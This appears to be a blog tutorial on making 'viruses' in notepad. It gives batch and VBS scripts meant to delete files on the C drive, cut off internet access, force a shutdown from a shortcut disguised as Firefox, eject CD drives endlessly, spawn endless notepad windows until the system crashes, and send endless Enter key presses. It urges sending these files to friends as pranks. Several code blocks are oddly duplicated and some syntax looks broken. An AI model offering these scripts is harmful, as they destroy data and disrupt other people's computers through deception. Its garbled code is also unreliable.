Today we are with the method of making viruses in at least 60 seconds. Today every second, a person is using a computer and almost every one of them knows about the virus. The virus is a malicious program that enters to your computer without your permission and can affect your data and operating system. Well, there are different types of viruses because Trojan horses are there and many more. However, have you ever thought of creating a virus? You can create one within seconds, and in some easy ways, it is possible that I am going to discuss this post. So let's get started.
1. Creating powerful Virus.
Note: Don’t run this virus on your computer it will completely format your C drive.
Step1: First of all open the notepad on your device.
Step2: Now copy this small code and paste it into your notepad.
@Echo off
Del C: *.* |y
Del C: *.* |y
Step3: now save the notepad file as any name but the extension must be .bat for eg Virus.bat
2. Creating a Harmless Cdrom Virus.
Step1: open the Notepad and paste the code given below.
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Step2: Now save it as .vbs extension for eg CD-ROM.vbs.
When you open this file, you will be shocked what this small simple, harmless virus can do.
Your CD/DVD drive will eject again and again.
Note: To stop this, you need to open the Task manager and then go to Process tab and find the wscript.exe file and End its task.
3. Create a virus to test your antivirus.
Again open the notepad and paste this code and save this code as “EICAR.COM”
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
This is the harmless virus that is used to check your antivirus is active or not. If your anti-virus is active then it will delete that file immediately.
4. Virus to stop someone’s Internet Access.
This virus is used for stopping someone to Access to the network. It's not harmful and it will don’t do any damage to your device. You can use this trick to prank your friends.
Step1: open the Notepad. And paste the following code in notepad.
@Echo off
Ipconfig /release
Ipconfig /release
Step2: now save it as .bat extension and send it to your friends. It will delete the IP address, therefore, they won't able to access the internet.
5. Creating a Matrix Type screen
Ok, this one not a virus its just a notepad trick that will show you the string of green Numbers appearing on the screen randomly. You can scare your friends with this trick because the screen looks like virus affected.
Step1: open the notepad and paste the code give code in notepad.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Step2: now save it as .bat extension for eg Matrix.bat . and run it.
6. Shutdown Virus.
You can create this virus to shut down your PC Suddenly. Well, this virus is totally harmless but it can cause some data loss due to sudden shutdown.
Step1: First right click on your Desktop and go to new and choose the “create shortcut” option.
Step2: Now one pop up window will appear and type shutdown -s -t 60 -c “Virus Detection. The computer is shutting down. That 60 represent the time in seconds you can put ant digit.
Step3: Then click on Next button and type Firefox or whatever you want.
Step4: then you have to change the icon of the Shortcut, like the icon of Firefox browser. And your Virus will look like your Firefox Browser and you can carry it any portable device and you can Shout Down your friends PC.
7. Endless Notepads.
This is not a Virus but it's not less then Virus. This code will pop up endless notepads until your device freeze and crash. And save with .bat extension.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
8. Endless Enters
This code will make a pop up with endless enters Button pressed continuously.
Save it as .bat extension
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
So this is all about How To Create a Virus in Less Than 60 seconds. I hope you guys will enjoy this.
FOR MORE TIPS AND TRICKS click here.
Cool ...
ReplyDeletethanks sir...
Delete